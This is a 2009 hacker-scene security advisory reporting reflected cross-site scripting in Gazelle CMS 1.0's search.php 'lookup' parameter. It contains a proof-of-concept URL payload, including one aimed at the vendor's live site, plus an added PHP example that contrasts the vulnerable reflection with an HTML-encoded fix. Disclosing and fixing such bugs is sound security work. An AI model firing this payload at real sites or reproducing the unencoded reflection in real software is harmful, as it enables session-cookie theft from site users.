                    ____________________
                   / /******ghostblup********\ \
                  / /  i love you Indonesia  \ \
                 / /    i love you ratih     \ \
                / /     i love you full      \ \
                ---------------------
                --------------------------
============================================
---------------------------------------------------------------------------------
[ghostblup|adv02] Anantasoft's Gazelle CMS 1.0
---------------------------------------------------------------------------------
Author   : ghostblup
Date     : September 3rd, 2009
Location : Palembang, Indonesia
My blog  : http://www.ghostblup.blogspot.com
Impact   : Exposure of sensitive information
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Anantasoft's Gazelle CMS
Version     : <= 1.0
Vendor      : http://www.anantasoft.com/
Download    : http://sourceforge.net/projects/ananta/
License     : GNU General Public License (GPL)
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Critical: cross-site scripting (XSS).
The "lookup" parameter of search.php is reflected into the response without being filtered or HTML-encoded. An attacker can inject script that executes in the site's origin, which allows the victim's session cookies to be stolen.

PoC/Exploit:
~~~~~~~~~~~~
http://www.example.com.my/[path]/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Demo Live:
~~~~~~~~~~
http://www.anantasoft.com/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Dork:
~~~~~
Google : N/A

Solution:
~~~~~~~~~
- Edit the source code so that the lookup parameter is validated on input and HTML-encoded before it is written into the page.
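The following is an added example written for this page; it is not Gazelle CMS source code and the function names and page markup are assumptions. It shows a minimal search.php that reflects the lookup parameter the way the advisory describes, next to a hardened version that HTML-encodes the value before it reaches the page, and it runs the advisory's PoC payload through both:

```php
<?php
// Added example, not Gazelle CMS code. Function names, the page template
// and the input-plausibility rule are assumptions made for illustration.

// VULNERABLE: the raw query parameter is concatenated straight into HTML.
// Requesting ?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E
// makes the browser run the injected script in the site's own origin.
function render_results_vulnerable(string $lookup): string
{
    return "<h2>Search results for: " . $lookup . "</h2>";
}

// HARDENED: encode the value for the HTML text context it is emitted into.
// ENT_QUOTES also encodes ' and " so the same value is safe inside quoted
// attributes; the explicit charset prevents encoding bypasses via invalid
// multibyte sequences.
function render_results_safe(string $lookup): string
{
    $encoded = htmlspecialchars($lookup, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Search results for: " . $encoded . "</h2>";
}

// Input-side check used in addition to (never instead of) output encoding:
// reject implausibly long terms and ASCII control characters so obvious
// probes can be logged rather than rendered. The limit of 200 is assumed.
function is_plausible_search_term(string $lookup): bool
{
    if (strlen($lookup) > 200) {
        return false;
    }
    return preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $lookup) === 0;
}

// Constructed input: the advisory's PoC payload, URL-decoded.
$payload = '<script>alert(document.cookie);</script>';

echo "vulnerable: " . render_results_vulnerable($payload) . "\n";
// prints the <script> tag verbatim, so a browser would execute it
echo "hardened:   " . render_results_safe($payload) . "\n";
// prints &lt;script&gt;alert(document.cookie);&lt;/script&gt; as inert text

// When served by a web server, handle the real request the hardened way.
if (PHP_SAPI !== 'cli') {
    $lookup = isset($_GET['lookup']) ? (string) $_GET['lookup'] : '';
    header('Content-Type: text/html; charset=UTF-8');
    if (!is_plausible_search_term($lookup)) {
        http_response_code(400);
        exit('Bad search term');
    }
    echo render_results_safe($lookup);
}
```

Run it with `php search_example.php` to see both renderings side by side. Output encoding is the actual fix for the reflected XSS; marking the session cookie HttpOnly (`session.cookie_httponly=1` in php.ini or via session_set_cookie_params) only limits what an injected script can read through document.cookie and does not remove the injection itself.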
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ My Love        : Ratih Permata Sari
~ My friends     : Amy, suset, revi, uwix^_^, Blackgirl, jasakreativkomputer, cyberlau, Vldaz, _persona
~ My inspiration : K-159, y3dips, az001, Hero
~ ngetem community, sayap community, echo.or.id, PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork
---------------------------------------------------------------------------
Contact:
~~~~~~~~
ghostblup@gmail.com
My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~